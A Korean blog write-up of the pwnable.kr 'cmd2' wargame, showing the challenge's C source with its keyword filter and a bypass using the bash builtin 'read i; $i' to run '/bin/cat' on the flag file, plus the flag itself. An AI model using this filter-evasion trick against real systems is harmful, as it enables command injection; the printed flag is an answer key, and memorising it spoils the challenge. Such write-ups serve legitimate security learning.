Pwnable.kr cmd2
Aug 28, 2016 · Wargame
cmd1의 플래그를 패스워드로 사용하여 cmd2에 접속할 수 있다.
cmd2@ubuntu:~$ cat cmd2.c
#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "=")!=0;
r += strstr(cmd, "PATH")!=0;
r += strstr(cmd, "export")!=0;
r += strstr(cmd, "/")!=0;
r += strstr(cmd, "`")!=0;
r += strstr(cmd, "flag")!=0;
return r;
}
extern char** environ;
void delete_env(){
char** p;
for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}
int main(int argc, char* argv[], char** envp){
delete_env();
putenv("PATH=/no_command_execution_until_you_become_a_hacker");
if(filter(argv[1])) return 0;
printf("%s\n", argv[1]);
system( argv[1] );
return 0;
}저번 문제에서 사용했던 /를 사용할 수 없게 되었다.
그리고 추가적으로 환경변수를 모두 제거하여 환경변수에 등록하여 사용하는 방법은 막히게 되었다.
그럼 이 문제는 다른 방법으로 풀어야 하는데, 이 문제에서 사용할 수 있는 방법은 배쉬의 기본함수를 이용하는 방법이다.
내가 선택한 방법은 read를 이용한 방법이다.
read는 읽어들여 변수에 저장하는 방법이다. 명령을 읽어들이게 하여 system함수에서 읽어들인 명령을 수행하도록 만드는게 목표이다.
cmd2@ubuntu:~$ read i; echo $i
test
^D
test다음과 같이 읽어들인 내용이 i변수에 저장됨을 볼 수 있다. $i를 echo의 인자로 주었는데 인자로 주지 않고 수행하는것을 보자.
cmd2@ubuntu:~$ read i; $i
ls
^D
cmd2 cmd2.c flagls 명령이 정상적으로 실행된다. read i; $i 라는 문자열은 filter에 걸리지 않으므로 정상적으로 수행시킬 수 있는 내용이다.
이를 이용하여 문제를 해결해 보도록 하겠다.
cmd2@ubuntu:~$ ./cmd2 "read i; \$i"
read i; $i
/bin/cat /home/cmd2/flag
FuN_w1th_5h3ll_v4riabl3s_haha